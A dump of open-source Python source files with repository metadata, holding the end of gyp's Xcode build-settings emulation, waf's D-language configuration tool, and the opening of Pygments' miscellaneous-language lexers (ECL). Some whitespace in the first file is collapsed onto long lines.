        result.append('echo DSYMUTIL\\(%s\\)' % self.spec['target_name'])
      result.append('dsymutil %s -o %s' % (output_binary, output + '.dSYM'))
    self.configname = None
    return result

  def _GetTargetPostbuilds(self, configname, output, output_binary,
                           quiet=False):
    """Returns a list of shell commands that contain the shell commands
    to run as postbuilds for this target, before the actual postbuilds."""
    # dSYMs need to build before stripping happens.
    return (
        self._GetDebugInfoPostbuilds(configname, output, output_binary, quiet) +
        self._GetStripPostbuilds(configname, output_binary, quiet))

  def _GetIOSPostbuilds(self, configname, output_binary):
    """Return a shell command to codesign the iOS output binary so it can
    be deployed to a device. This should be run as the very last step of the
    build."""
    # Codesigning applies only to iOS executables.
    if not (self.isIOS and self.spec['type'] == 'executable'):
      return []

    settings = self.xcode_settings[configname]
    key = self._GetIOSCodeSignIdentityKey(settings)
    if not key:
      return []

    # Warn for any unimplemented signing xcode keys.
unimpl = ['OTHER_CODE_SIGN_FLAGS'] unimpl = set(unimpl) & set(self.xcode_settings[configname].keys()) if unimpl: print 'Warning: Some codesign keys not implemented, ignoring: %s' % ( ', '.join(sorted(unimpl))) return ['%s code-sign-bundle "%s" "%s" "%s" "%s"' % ( os.path.join('${TARGET_BUILD_DIR}', 'gyp-mac-tool'), key, settings.get('CODE_SIGN_RESOURCE_RULES_PATH', ''), settings.get('CODE_SIGN_ENTITLEMENTS', ''), settings.get('PROVISIONING_PROFILE', '')) ] def _GetIOSCodeSignIdentityKey(self, settings): identity = settings.get('CODE_SIGN_IDENTITY') if not identity: return None if identity not in XcodeSettings._codesigning_key_cache: output = subprocess.check_output( ['security', 'find-identity', '-p', 'codesigning', '-v']) for line in output.splitlines(): if identity in line: fingerprint = line.split()[1] cache = XcodeSettings._codesigning_key_cache assert identity not in cache or fingerprint == cache[identity], ( "Multiple codesigning fingerprints for identity: %s" % identity) XcodeSettings._codesigning_key_cache[identity] = fingerprint return XcodeSettings._codesigning_key_cache.get(identity, '') def AddImplicitPostbuilds(self, configname, output, output_binary, postbuilds=[], quiet=False): """Returns a list of shell commands that should run before and after |postbuilds|.""" assert output_binary is not None pre = self._GetTargetPostbuilds(configname, output, output_binary, quiet) post = self._GetIOSPostbuilds(configname, output_binary) return pre + postbuilds + post def _AdjustLibrary(self, library, config_name=None): if library.endswith('.framework'): l = '-framework ' + os.path.splitext(os.path.basename(library))[0] else: m = self.library_re.match(library) if m: l = '-l' + m.group(1) else: l = library sdk_root = self._SdkPath(config_name) if not sdk_root: sdk_root = '' # Xcode 7 started shipping with ".tbd" (text based stubs) files instead of # ".dylib" without providing a real support for them. 
What it does, for # "/usr/lib" libraries, is do "-L/usr/lib -lname" which is dependent on the # library order and cause collision when building Chrome. # # Instead substitude ".tbd" to ".dylib" in the generated project when the # following conditions are both true: # - library is referenced in the gyp file as "$(SDKROOT)/**/*.dylib", # - the ".dylib" file does not exists but a ".tbd" file do. library = l.replace('$(SDKROOT)', sdk_root) if l.startswith('$(SDKROOT)'): basename, ext = os.path.splitext(library) if ext == '.dylib' and not os.path.exists(library): tbd_library = basename + '.tbd' if os.path.exists(tbd_library): library = tbd_library return library def AdjustLibraries(self, libraries, config_name=None): """Transforms entries like 'Cocoa.framework' in libraries into entries like '-framework Cocoa', 'libcrypto.dylib' into '-lcrypto', etc. """ libraries = [self._AdjustLibrary(library, config_name) for library in libraries] return libraries def _BuildMachineOSBuild(self): return GetStdout(['sw_vers', '-buildVersion']) def _XcodeIOSDeviceFamily(self, configname): family = self.xcode_settings[configname].get('TARGETED_DEVICE_FAMILY', '1') return [int(x) for x in family.split(',')] def GetExtraPlistItems(self, configname=None): """Returns a dictionary with extra items to insert into Info.plist.""" if configname not in XcodeSettings._plist_cache: cache = {} cache['BuildMachineOSBuild'] = self._BuildMachineOSBuild() xcode, xcode_build = XcodeVersion() cache['DTXcode'] = xcode cache['DTXcodeBuild'] = xcode_build sdk_root = self._SdkRoot(configname) if not sdk_root: sdk_root = self._DefaultSdkRoot() cache['DTSDKName'] = sdk_root if xcode >= '0430': cache['DTSDKBuild'] = self._GetSdkVersionInfoItem( sdk_root, 'ProductBuildVersion') else: cache['DTSDKBuild'] = cache['BuildMachineOSBuild'] if self.isIOS: cache['DTPlatformName'] = cache['DTSDKName'] if configname.endswith("iphoneos"): cache['DTPlatformVersion'] = self._GetSdkVersionInfoItem( sdk_root, 'ProductVersion') 
cache['CFBundleSupportedPlatforms'] = ['iPhoneOS'] else: cache['CFBundleSupportedPlatforms'] = ['iPhoneSimulator'] XcodeSettings._plist_cache[configname] = cache # Include extra plist items that are per-target, not per global # XcodeSettings. items = dict(XcodeSettings._plist_cache[configname]) if self.isIOS: items['UIDeviceFamily'] = self._XcodeIOSDeviceFamily(configname) return items def _DefaultSdkRoot(self): """Returns the default SDKROOT to use. Prior to version 5.0.0, if SDKROOT was not explicitly set in the Xcode project, then the environment variable was empty. Starting with this version, Xcode uses the name of the newest SDK installed. """ xcode_version, xcode_build = XcodeVersion() if xcode_version < '0500': return '' default_sdk_path = self._XcodeSdkPath('') default_sdk_root = XcodeSettings._sdk_root_cache.get(default_sdk_path) if default_sdk_root: return default_sdk_root try: all_sdks = GetStdout(['xcodebuild', '-showsdks']) except: # If xcodebuild fails, there will be no valid SDKs return '' for line in all_sdks.splitlines(): items = line.split() if len(items) >= 3 and items[-2] == '-sdk': sdk_root = items[-1] sdk_path = self._XcodeSdkPath(sdk_root) if sdk_path == default_sdk_path: return sdk_root return '' class MacPrefixHeader(object): """A class that helps with emulating Xcode's GCC_PREFIX_HEADER feature. This feature consists of several pieces: * If GCC_PREFIX_HEADER is present, all compilations in that project get an additional |-include path_to_prefix_header| cflag. * If GCC_PRECOMPILE_PREFIX_HEADER is present too, then the prefix header is instead compiled, and all other compilations in the project get an additional |-include path_to_compiled_header| instead. + Compiled prefix headers have the extension gch. There is one gch file for every language used in the project (c, cc, m, mm), since gch files for different languages aren't compatible. 
+ gch files themselves are built with the target's normal cflags, but they obviously don't get the |-include| flag. Instead, they need a -x flag that describes their language. + All o files in the target need to depend on the gch file, to make sure it's built before any o file is built. This class helps with some of these tasks, but it needs help from the build system for writing dependencies to the gch files, for writing build commands for the gch files, and for figuring out the location of the gch files. """ def __init__(self, xcode_settings, gyp_path_to_build_path, gyp_path_to_build_output): """If xcode_settings is None, all methods on this class are no-ops. Args: gyp_path_to_build_path: A function that takes a gyp-relative path, and returns a path relative to the build directory. gyp_path_to_build_output: A function that takes a gyp-relative path and a language code ('c', 'cc', 'm', or 'mm'), and that returns a path to where the output of precompiling that path for that language should be placed (without the trailing '.gch'). """ # This doesn't support per-configuration prefix headers. Good enough # for now. self.header = None self.compile_headers = False if xcode_settings: self.header = xcode_settings.GetPerTargetSetting('GCC_PREFIX_HEADER') self.compile_headers = xcode_settings.GetPerTargetSetting( 'GCC_PRECOMPILE_PREFIX_HEADER', default='NO') != 'NO' self.compiled_headers = {} if self.header: if self.compile_headers: for lang in ['c', 'cc', 'm', 'mm']: self.compiled_headers[lang] = gyp_path_to_build_output( self.header, lang) self.header = gyp_path_to_build_path(self.header) def _CompiledHeader(self, lang, arch): assert self.compile_headers h = self.compiled_headers[lang] if arch: h += '.' 
+ arch return h def GetInclude(self, lang, arch=None): """Gets the cflags to include the prefix header for language |lang|.""" if self.compile_headers and lang in self.compiled_headers: return '-include %s' % self._CompiledHeader(lang, arch) elif self.header: return '-include %s' % self.header else: return '' def _Gch(self, lang, arch): """Returns the actual file name of the prefix header for language |lang|.""" assert self.compile_headers return self._CompiledHeader(lang, arch) + '.gch' def GetObjDependencies(self, sources, objs, arch=None): """Given a list of source files and the corresponding object files, returns a list of (source, object, gch) tuples, where |gch| is the build-directory relative path to the gch file each object file depends on. |compilable[i]| has to be the source file belonging to |objs[i]|.""" if not self.header or not self.compile_headers: return [] result = [] for source, obj in zip(sources, objs): ext = os.path.splitext(source)[1] lang = { '.c': 'c', '.cpp': 'cc', '.cc': 'cc', '.cxx': 'cc', '.m': 'm', '.mm': 'mm', }.get(ext, None) if lang: result.append((source, obj, self._Gch(lang, arch))) return result def GetPchBuildCommands(self, arch=None): """Returns [(path_to_gch, language_flag, language, header)]. |path_to_gch| and |header| are relative to the build directory. """ if not self.header or not self.compile_headers: return [] return [ (self._Gch('c', arch), '-x c-header', 'c', self.header), (self._Gch('cc', arch), '-x c++-header', 'cc', self.header), (self._Gch('m', arch), '-x objective-c-header', 'm', self.header), (self._Gch('mm', arch), '-x objective-c++-header', 'mm', self.header), ] def XcodeVersion(): """Returns a tuple of version and build version of installed Xcode.""" # `xcodebuild -version` output looks like # Xcode 4.6.3 # Build version 4H1503 # or like # Xcode 3.2.6 # Component versions: DevToolsCore-1809.0; DevToolsSupport-1806.0 # BuildVersion: 10M2518 # Convert that to '0463', '4H1503'. 
  # --- continuation of XcodeVersion() (its def is above) ---
  global XCODE_VERSION_CACHE
  if XCODE_VERSION_CACHE:
    return XCODE_VERSION_CACHE
  try:
    version_list = GetStdout(['xcodebuild', '-version']).splitlines()
    # In some circumstances xcodebuild exits 0 but doesn't return
    # the right results; for example, a user on 10.7 or 10.8 with
    # a bogus path set via xcode-select
    # In that case this may be a CLT-only install so fall back to
    # checking that version.
    if len(version_list) < 2:
      raise GypError("xcodebuild returned unexpected results")
  except:
    # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
    # kept as-is to preserve behavior.
    version = CLTVersion()
    if version:
      version = re.match(r'(\d\.\d\.?\d*)', version).groups()[0]
    else:
      raise GypError("No Xcode or CLT version detected!")
    # The CLT has no build information, so we return an empty string.
    version_list = [version, '']
  version = version_list[0]
  build = version_list[-1]
  # Be careful to convert "4.2" to "0420":
  version = version.split()[-1].replace('.', '')
  version = (version + '0' * (3 - len(version))).zfill(4)
  if build:
    build = build.split()[-1]
  XCODE_VERSION_CACHE = (version, build)
  return XCODE_VERSION_CACHE


# This function ported from the logic in Homebrew's CLT version check
def CLTVersion():
  """Returns the version of command-line tools from pkgutil.

  Implicitly returns None when none of the known package ids is installed.
  """
  # pkgutil output looks like
  #   package-id: com.apple.pkg.CLTools_Executables
  #   version: 5.0.1.0.1.1382131676
  #   volume: /
  #   location: /
  #   install-time: 1382544035
  #   groups: com.apple.FindSystemFiles.pkg-group com.apple.DevToolsBoth.pkg-group com.apple.DevToolsNonRelocatableShared.pkg-group
  STANDALONE_PKG_ID = "com.apple.pkg.DeveloperToolsCLILeo"
  FROM_XCODE_PKG_ID = "com.apple.pkg.DeveloperToolsCLI"
  MAVERICKS_PKG_ID = "com.apple.pkg.CLTools_Executables"

  regex = re.compile('version: (?P<version>.+)')
  # Try each known package id; any failure (e.g. package not installed)
  # just moves on to the next candidate.
  for key in [MAVERICKS_PKG_ID, STANDALONE_PKG_ID, FROM_XCODE_PKG_ID]:
    try:
      output = GetStdout(['/usr/sbin/pkgutil', '--pkg-info', key])
      return re.search(regex, output).groupdict()['version']
    except:
      continue


def GetStdout(cmdlist):
  """Returns the content of standard output returned by invoking |cmdlist|.

  Raises |GypError| if the command returns with a non-zero return code."""
  job = subprocess.Popen(cmdlist, stdout=subprocess.PIPE)
  out = job.communicate()[0]
  if job.returncode != 0:
    sys.stderr.write(out + '\n')
    raise GypError('Error %d running %s' % (job.returncode, cmdlist[0]))
  # Strip the trailing newline so callers can compare values directly.
  return out.rstrip('\n')


def MergeGlobalXcodeSettingsToSpec(global_dict, spec):
  """Merges the global xcode_settings dictionary into each configuration of the
  target represented by spec. For keys that are both in the global and the local
  xcode_settings dict, the local key gets precedence.
  """
  # The xcode generator special-cases global xcode_settings and does something
  # that amounts to merging in the global xcode_settings into each local
  # xcode_settings dict.
  global_xcode_settings = global_dict.get('xcode_settings', {})
  for config in spec['configurations'].values():
    if 'xcode_settings' in config:
      new_settings = global_xcode_settings.copy()
      new_settings.update(config['xcode_settings'])
      config['xcode_settings'] = new_settings


def IsMacBundle(flavor, spec):
  """Returns if |spec| should be treated as a bundle.

  Bundles are directories with a certain subdirectory structure, instead of
  just a single file. Bundle rules do not produce a binary but also package
  resources into that directory."""
  is_mac_bundle = (int(spec.get('mac_bundle', 0)) != 0 and flavor == 'mac')
  if is_mac_bundle:
    # A bundle must wrap an actual product; 'none' targets produce nothing.
    assert spec['type'] != 'none', (
        'mac_bundle targets cannot have type none (target "%s")' %
            spec['target_name'])
  return is_mac_bundle


def GetMacBundleResources(product_dir, xcode_settings, resources):
  """Yields (output, resource) pairs for every resource in |resources|.
  Only call this for mac bundle targets.

  Args:
      product_dir: Path to the directory containing the output bundle,
          relative to the build directory.
      xcode_settings: The XcodeSettings of the current target.
      resources: A list of bundle resources, relative to the build directory.
""" dest = os.path.join(product_dir, xcode_settings.GetBundleResourceFolder()) for res in resources: output = dest # The make generator doesn't support it, so forbid it everywhere # to keep the generators more interchangable. assert ' ' not in res, ( "Spaces in resource filenames not supported (%s)" % res) # Split into (path,file). res_parts = os.path.split(res) # Now split the path into (prefix,maybe.lproj). lproj_parts = os.path.split(res_parts[0]) # If the resource lives in a .lproj bundle, add that to the destination. if lproj_parts[1].endswith('.lproj'): output = os.path.join(output, lproj_parts[1]) output = os.path.join(output, res_parts[1]) # Compiled XIB files are referred to by .nib. if output.endswith('.xib'): output = os.path.splitext(output)[0] + '.nib' # Compiled storyboard files are referred to by .storyboardc. if output.endswith('.storyboard'): output = os.path.splitext(output)[0] + '.storyboardc' yield output, res def GetMacInfoPlist(product_dir, xcode_settings, gyp_path_to_build_path): """Returns (info_plist, dest_plist, defines, extra_env), where: * |info_plist| is the source plist path, relative to the build directory, * |dest_plist| is the destination plist path, relative to the build directory, * |defines| is a list of preprocessor defines (empty if the plist shouldn't be preprocessed, * |extra_env| is a dict of env variables that should be exported when invoking |mac_tool copy-info-plist|. Only call this for mac bundle targets. Args: product_dir: Path to the directory containing the output bundle, relative to the build directory. xcode_settings: The XcodeSettings of the current target. gyp_to_build_path: A function that converts paths relative to the current gyp file to paths relative to the build direcotry. """ info_plist = xcode_settings.GetPerTargetSetting('INFOPLIST_FILE') if not info_plist: return None, None, [], {} # The make generator doesn't support it, so forbid it everywhere # to keep the generators more interchangable. 
assert ' ' not in info_plist, ( "Spaces in Info.plist filenames not supported (%s)" % info_plist) info_plist = gyp_path_to_build_path(info_plist) # If explicitly set to preprocess the plist, invoke the C preprocessor and # specify any defines as -D flags. if xcode_settings.GetPerTargetSetting( 'INFOPLIST_PREPROCESS', default='NO') == 'YES': # Create an intermediate file based on the path. defines = shlex.split(xcode_settings.GetPerTargetSetting( 'INFOPLIST_PREPROCESSOR_DEFINITIONS', default='')) else: defines = [] dest_plist = os.path.join(product_dir, xcode_settings.GetBundlePlistPath()) extra_env = xcode_settings.GetPerTargetSettings() return info_plist, dest_plist, defines, extra_env def _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings=None): """Return the environment variables that Xcode would set. See http://developer.apple.com/library/mac/#documentation/DeveloperTools/Reference/XcodeBuildSettingRef/1-Build_Setting_Reference/build_setting_ref.html#//apple_ref/doc/uid/TP40003931-CH3-SW153 for a full list. Args: xcode_settings: An XcodeSettings object. If this is None, this function returns an empty dict. built_products_dir: Absolute path to the built products dir. srcroot: Absolute path to the source root. configuration: The build configuration name. additional_settings: An optional dict with more values to add to the result. """ if not xcode_settings: return {} # This function is considered a friend of XcodeSettings, so let it reach into # its implementation details. spec = xcode_settings.spec # These are filled in on a as-needed basis. 
env = { 'BUILT_FRAMEWORKS_DIR' : built_products_dir, 'BUILT_PRODUCTS_DIR' : built_products_dir, 'CONFIGURATION' : configuration, 'PRODUCT_NAME' : xcode_settings.GetProductName(), # See /Developer/Platforms/MacOSX.platform/Developer/Library/Xcode/Specifications/MacOSX\ Product\ Types.xcspec for FULL_PRODUCT_NAME 'SRCROOT' : srcroot, 'SOURCE_ROOT': '${SRCROOT}', # This is not true for static libraries, but currently the env is only # written for bundles: 'TARGET_BUILD_DIR' : built_products_dir, 'TEMP_DIR' : '${TMPDIR}', } if xcode_settings.GetPerConfigSetting('SDKROOT', configuration): env['SDKROOT'] = xcode_settings._SdkPath(configuration) else: env['SDKROOT'] = '' if spec['type'] in ( 'executable', 'static_library', 'shared_library', 'loadable_module'): env['EXECUTABLE_NAME'] = xcode_settings.GetExecutableName() env['EXECUTABLE_PATH'] = xcode_settings.GetExecutablePath() env['FULL_PRODUCT_NAME'] = xcode_settings.GetFullProductName() mach_o_type = xcode_settings.GetMachOType() if mach_o_type: env['MACH_O_TYPE'] = mach_o_type env['PRODUCT_TYPE'] = xcode_settings.GetProductType() if xcode_settings._IsBundle(): env['CONTENTS_FOLDER_PATH'] = \ xcode_settings.GetBundleContentsFolderPath() env['UNLOCALIZED_RESOURCES_FOLDER_PATH'] = \ xcode_settings.GetBundleResourceFolder() env['INFOPLIST_PATH'] = xcode_settings.GetBundlePlistPath() env['WRAPPER_NAME'] = xcode_settings.GetWrapperName() install_name = xcode_settings.GetInstallName() if install_name: env['LD_DYLIB_INSTALL_NAME'] = install_name install_name_base = xcode_settings.GetInstallNameBase() if install_name_base: env['DYLIB_INSTALL_NAME_BASE'] = install_name_base if XcodeVersion() >= '0500' and not env.get('SDKROOT'): sdk_root = xcode_settings._SdkRoot(configuration) if not sdk_root: sdk_root = xcode_settings._XcodeSdkPath('') if sdk_root is None: sdk_root = '' env['SDKROOT'] = sdk_root if not additional_settings: additional_settings = {} else: # Flatten lists to strings. 
for k in additional_settings: if not isinstance(additional_settings[k], str): additional_settings[k] = ' '.join(additional_settings[k]) additional_settings.update(env) for k in additional_settings: additional_settings[k] = _NormalizeEnvVarReferences(additional_settings[k]) return additional_settings def _NormalizeEnvVarReferences(str): """Takes a string containing variable references in the form ${FOO}, $(FOO), or $FOO, and returns a string with all variable references in the form ${FOO}. """ # $FOO -> ${FOO} str = re.sub(r'\$([a-zA-Z_][a-zA-Z0-9_]*)', r'${\1}', str) # $(FOO) -> ${FOO} matches = re.findall(r'(\$\(([a-zA-Z0-9\-_]+)\))', str) for match in matches: to_replace, variable = match assert '$(' not in match, '$($(FOO)) variables not supported: ' + match str = str.replace(to_replace, '${' + variable + '}') return str def ExpandEnvVars(string, expansions): """Expands ${VARIABLES}, $(VARIABLES), and $VARIABLES in string per the expansions list. If the variable expands to something that references another variable, this variable is expanded as well if it's in env -- until no variables present in env are left.""" for k, v in reversed(expansions): string = string.replace('${' + k + '}', v) string = string.replace('$(' + k + ')', v) string = string.replace('$' + k, v) return string def _TopologicallySortedEnvVarKeys(env): """Takes a dict |env| whose values are strings that can refer to other keys, for example env['foo'] = '$(bar) and $(baz)'. Returns a list L of all keys of env such that key2 is after key1 in L if env[key2] refers to env[key1]. Throws an Exception in case of dependency cycles. """ # Since environment variables can refer to other variables, the evaluation # order is important. Below is the logic to compute the dependency graph # and sort it. regex = re.compile(r'\$\{([a-zA-Z0-9\-_]+)\}') def GetEdges(node): # Use a definition of edges such that user_of_variable -> used_varible. 
# This happens to be easier in this case, since a variable's # definition contains all variables it references in a single string. # We can then reverse the result of the topological sort at the end. # Since: reverse(topsort(DAG)) = topsort(reverse_edges(DAG)) matches = set([v for v in regex.findall(env[node]) if v in env]) for dependee in matches: assert '${' not in dependee, 'Nested variables not supported: ' + dependee return matches try: # Topologically sort, and then reverse, because we used an edge definition # that's inverted from the expected result of this function (see comment # above). order = gyp.common.TopologicallySorted(env.keys(), GetEdges) order.reverse() return order except gyp.common.CycleError, e: raise GypError( 'Xcode environment variables are cyclically dependent: ' + str(e.nodes)) def GetSortedXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings=None): env = _GetXcodeEnv(xcode_settings, built_products_dir, srcroot, configuration, additional_settings) return [(key, env[key]) for key in _TopologicallySortedEnvVarKeys(env)] def GetSpecPostbuildCommands(spec, quiet=False): """Returns the list of postbuilds explicitly defined on |spec|, in a form executable by a shell.""" postbuilds = [] for postbuild in spec.get('postbuilds', []): if not quiet: postbuilds.append('echo POSTBUILD\\(%s\\) %s' % ( spec['target_name'], postbuild['postbuild_name'])) postbuilds.append(gyp.common.EncodePOSIXShellList(postbuild['action'])) return postbuilds def _HasIOSTarget(targets): """Returns true if any target contains the iOS specific key IPHONEOS_DEPLOYMENT_TARGET.""" for target_dict in targets.values(): for config in target_dict['configurations'].values(): if config.get('xcode_settings', {}).get('IPHONEOS_DEPLOYMENT_TARGET'): return True return False def _AddIOSDeviceConfigurations(targets): """Clone all targets and append -iphoneos to the name. 
Configure these targets to build for iOS devices and use correct architectures for those builds.""" for target_dict in targets.itervalues(): toolset = target_dict['toolset'] configs = target_dict['configurations'] for config_name, config_dict in dict(configs).iteritems(): iphoneos_config_dict = copy.deepcopy(config_dict) configs[config_name + '-iphoneos'] = iphoneos_config_dict configs[config_name + '-iphonesimulator'] = config_dict if toolset == 'target': iphoneos_config_dict['xcode_settings']['SDKROOT'] = 'iphoneos' return targets def CloneConfigurationForDeviceAndEmulator(target_dicts): """If |target_dicts| contains any iOS targets, automatically create -iphoneos targets for iOS device builds.""" if _HasIOSTarget(target_dicts): return _AddIOSDeviceConfigurations(target_dicts) return target_dicts
apache-2.0
gcode-mirror/audacity
lib-src/lv2/lv2/plugins/eg01-amp.lv2/waflib/Tools/d_config.py
316
1208
#! /usr/bin/env python # encoding: utf-8 # WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file from waflib import Utils from waflib.Configure import conf @conf def d_platform_flags(self): v=self.env if not v.DEST_OS: v.DEST_OS=Utils.unversioned_sys_platform() binfmt=Utils.destos_to_binfmt(self.env.DEST_OS) if binfmt=='pe': v['dprogram_PATTERN']='%s.exe' v['dshlib_PATTERN']='lib%s.dll' v['dstlib_PATTERN']='lib%s.a' elif binfmt=='mac-o': v['dprogram_PATTERN']='%s' v['dshlib_PATTERN']='lib%s.dylib' v['dstlib_PATTERN']='lib%s.a' else: v['dprogram_PATTERN']='%s' v['dshlib_PATTERN']='lib%s.so' v['dstlib_PATTERN']='lib%s.a' DLIB=''' version(D_Version2) { import std.stdio; int main() { writefln("phobos2"); return 0; } } else { version(Tango) { import tango.stdc.stdio; int main() { printf("tango"); return 0; } } else { import std.stdio; int main() { writefln("phobos1"); return 0; } } } ''' @conf def check_dlibrary(self,execute=True): ret=self.check_cc(features='d dprogram',fragment=DLIB,compile_filename='test.d',execute=execute,define_ret=True) if execute: self.env.DLIBRARY=ret.strip()
gpl-2.0
nhtera/github.io
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/lexers/other.py
94
170941
# -*- coding: utf-8 -*- """ pygments.lexers.other ~~~~~~~~~~~~~~~~~~~~~ Lexers for other languages. :copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ import re from pygments.lexer import RegexLexer, include, bygroups, using, \ this, combined, ExtendedRegexLexer from pygments.token import Error, Punctuation, Literal, Token, \ Text, Comment, Operator, Keyword, Name, String, Number, Generic, \ Whitespace from pygments.util import get_bool_opt from pygments.lexers.web import HtmlLexer from pygments.lexers._openedgebuiltins import OPENEDGEKEYWORDS from pygments.lexers._robotframeworklexer import RobotFrameworkLexer # backwards compatibility from pygments.lexers.sql import SqlLexer, MySqlLexer, SqliteConsoleLexer from pygments.lexers.shell import BashLexer, BashSessionLexer, BatchLexer, \ TcshLexer __all__ = ['BrainfuckLexer', 'BefungeLexer', 'RedcodeLexer', 'MOOCodeLexer', 'SmalltalkLexer', 'LogtalkLexer', 'GnuplotLexer', 'PovrayLexer', 'AppleScriptLexer', 'ModelicaLexer', 'RebolLexer', 'ABAPLexer', 'NewspeakLexer', 'GherkinLexer', 'AsymptoteLexer', 'PostScriptLexer', 'AutohotkeyLexer', 'GoodDataCLLexer', 'MaqlLexer', 'ProtoBufLexer', 'HybrisLexer', 'AwkLexer', 'Cfengine3Lexer', 'SnobolLexer', 'ECLLexer', 'UrbiscriptLexer', 'OpenEdgeLexer', 'BroLexer', 'MscgenLexer', 'KconfigLexer', 'VGLLexer', 'SourcePawnLexer', 'RobotFrameworkLexer', 'PuppetLexer', 'NSISLexer', 'RPMSpecLexer', 'CbmBasicV2Lexer', 'AutoItLexer', 'RexxLexer'] class ECLLexer(RegexLexer): """ Lexer for the declarative big-data `ECL <http://hpccsystems.com/community/docs/ecl-language-reference/html>`_ language. 
*New in Pygments 1.5.* """ name = 'ECL' aliases = ['ecl'] filenames = ['*.ecl'] mimetypes = ['application/x-ecl'] flags = re.IGNORECASE | re.MULTILINE tokens = { 'root': [ include('whitespace'), include('statements'), ], 'whitespace': [ (r'\s+', Text), (r'\/\/.*', Comment.Single), (r'/(\\\n)?\*(.|\n)*?\*(\\\n)?/', Comment.Multiline), ], 'statements': [ include('types'), include('keywords'), include('functions'), include('hash'), (r'"', String, 'string'), (r'\'', String, 'string'), (r'(\d+\.\d*|\.\d+|\d+)[eE][+-]?\d+[LlUu]*', Number.Float), (r'(\d+\.\d*|\.\d+|\d+[fF])[fF]?', Number.Float), (r'0x[0-9a-fA-F]+[LlUu]*', Number.Hex), (r'0[0-7]+[LlUu]*', Number.Oct), (r'\d+[LlUu]*', Number.Integer), (r'\*/', Error), (r'[~!%^&*+=|?:<>/-]+', Operator), (r'[{}()\[\],.;]', Punctuation), (r'[a-zA-Z_][a-zA-Z0-9_]*', Name), ], 'hash': [ (r'^#.*$', Comment.Preproc), ], 'types': [ (r'(RECORD|END)\D', Keyword.Declaration), (r'((?:ASCII|BIG_ENDIAN|BOOLEAN|DATA|DECIMAL|EBCDIC|INTEGER|PATTERN|' r'QSTRING|REAL|RECORD|RULE|SET OF|STRING|TOKEN|UDECIMAL|UNICODE|' r'UNSIGNED|VARSTRING|VARUNICODE)\d*)(\s+)', bygroups(Keyword.Type, Text)), ], 'keywords': [ (r'(APPLY|ASSERT|BUILD|BUILDINDEX|EVALUATE|FAIL|KEYDIFF|KEYPATCH|' r'LOADXML|NOTHOR|NOTIFY|OUTPUT|PARALLEL|SEQUENTIAL|SOAPCALL|WAIT' r'CHECKPOINT|DEPRECATED|FAILCODE|FAILMESSAGE|FAILURE|GLOBAL|' r'INDEPENDENT|ONWARNING|PERSIST|PRIORITY|RECOVERY|STORED|SUCCESS|' r'WAIT|WHEN)\b', Keyword.Reserved), # These are classed differently, check later (r'(ALL|AND|ANY|AS|ATMOST|BEFORE|BEGINC\+\+|BEST|BETWEEN|CASE|CONST|' r'COUNTER|CSV|DESCEND|ENCRYPT|ENDC\+\+|ENDMACRO|EXCEPT|EXCLUSIVE|' r'EXPIRE|EXPORT|EXTEND|FALSE|FEW|FIRST|FLAT|FULL|FUNCTION|GROUP|' r'HEADER|HEADING|HOLE|IFBLOCK|IMPORT|IN|JOINED|KEEP|KEYED|LAST|' r'LEFT|LIMIT|LOAD|LOCAL|LOCALE|LOOKUP|MACRO|MANY|MAXCOUNT|' r'MAXLENGTH|MIN SKEW|MODULE|INTERFACE|NAMED|NOCASE|NOROOT|NOSCAN|' r'NOSORT|NOT|OF|ONLY|OPT|OR|OUTER|OVERWRITE|PACKED|PARTITION|' 
r'PENALTY|PHYSICALLENGTH|PIPE|QUOTE|RELATIONSHIP|REPEAT|RETURN|' r'RIGHT|SCAN|SELF|SEPARATOR|SERVICE|SHARED|SKEW|SKIP|SQL|STORE|' r'TERMINATOR|THOR|THRESHOLD|TOKEN|TRANSFORM|TRIM|TRUE|TYPE|' r'UNICODEORDER|UNSORTED|VALIDATE|VIRTUAL|WHOLE|WILD|WITHIN|XML|' r'XPATH|__COMPRESSED__)\b', Keyword.Reserved), ], 'functions': [ (r'(ABS|ACOS|ALLNODES|ASCII|ASIN|ASSTRING|ATAN|ATAN2|AVE|CASE|' r'CHOOSE|CHOOSEN|CHOOSESETS|CLUSTERSIZE|COMBINE|CORRELATION|COS|' r'COSH|COUNT|COVARIANCE|CRON|DATASET|DEDUP|DEFINE|DENORMALIZE|' r'DISTRIBUTE|DISTRIBUTED|DISTRIBUTION|EBCDIC|ENTH|ERROR|EVALUATE|' r'EVENT|EVENTEXTRA|EVENTNAME|EXISTS|EXP|FAILCODE|FAILMESSAGE|' r'FETCH|FROMUNICODE|GETISVALID|GLOBAL|GRAPH|GROUP|HASH|HASH32|' r'HASH64|HASHCRC|HASHMD5|HAVING|IF|INDEX|INTFORMAT|ISVALID|' r'ITERATE|JOIN|KEYUNICODE|LENGTH|LIBRARY|LIMIT|LN|LOCAL|LOG|LOOP|' r'MAP|MATCHED|MATCHLENGTH|MATCHPOSITION|MATCHTEXT|MATCHUNICODE|' r'MAX|MERGE|MERGEJOIN|MIN|NOLOCAL|NONEMPTY|NORMALIZE|PARSE|PIPE|' r'POWER|PRELOAD|PROCESS|PROJECT|PULL|RANDOM|RANGE|RANK|RANKED|' r'REALFORMAT|RECORDOF|REGEXFIND|REGEXREPLACE|REGROUP|REJECTED|' r'ROLLUP|ROUND|ROUNDUP|ROW|ROWDIFF|SAMPLE|SET|SIN|SINH|SIZEOF|' r'SOAPCALL|SORT|SORTED|SQRT|STEPPED|STORED|SUM|TABLE|TAN|TANH|' r'THISNODE|TOPN|TOUNICODE|TRANSFER|TRIM|TRUNCATE|TYPEOF|UNGROUP|' r'UNICODEORDER|VARIANCE|WHICH|WORKUNIT|XMLDECODE|XMLENCODE|' r'XMLTEXT|XMLUNICODE)\b', Name.Function), ], 'string': [ (r'"', String, '#pop'), (r'\'', String, '#pop'), (r'[^"\']+', String), ], } class BrainfuckLexer(RegexLexer): """ Lexer for the esoteric `BrainFuck <http://www.muppetlabs.com/~breadbox/bf/>`_ language. 
